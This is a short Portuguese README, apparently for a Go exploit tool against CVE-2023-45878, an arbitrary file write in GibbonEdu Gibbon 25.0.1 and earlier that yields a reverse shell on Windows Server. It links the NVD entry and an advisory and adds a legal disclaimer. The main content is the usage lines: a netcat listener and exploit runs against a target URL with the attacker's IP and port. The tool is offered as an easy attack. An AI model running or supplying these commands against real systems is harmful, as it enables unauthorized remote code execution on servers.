
CVE-2023-45878 exploit fácil | reverse shell
GibbonEdu Gibbon versão 25.0.1 e anteriores permite Escrita Arbitrária de Arquivos (Arbitrary File Write)
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
Este exploit é fornecido apenas para fins educacionais e de pesquisa. O uso não autorizado deste código contra sistemas sem permissão explícita é ilegal e pode violar leis de crimes cibernéticos em diversas jurisdições. Não assumo nenhuma responsabilidade por qualquer uso indevido ou dano causado por este exploit.
É de responsabilidade do usuário garantir conformidade com todas as leis aplicáveis e diretrizes éticas antes de executar este código. Não utilize este exploit para atividades maliciosas.
Este exploit funciona exclusivamente no Windows Server. Se a versão vulnerável do Gibbon estiver rodando em um servidor Linux, será necessário modificar o exploit adequadamente.
nc -lnvp <PORTA>go run gibbon-rce-exploit -url http://vulneravel.com -ip <IP> -p <PORTA> ou ./gibbon-rce-exploit -url http://vulneravel.com -ip <IP> -p <PORTA>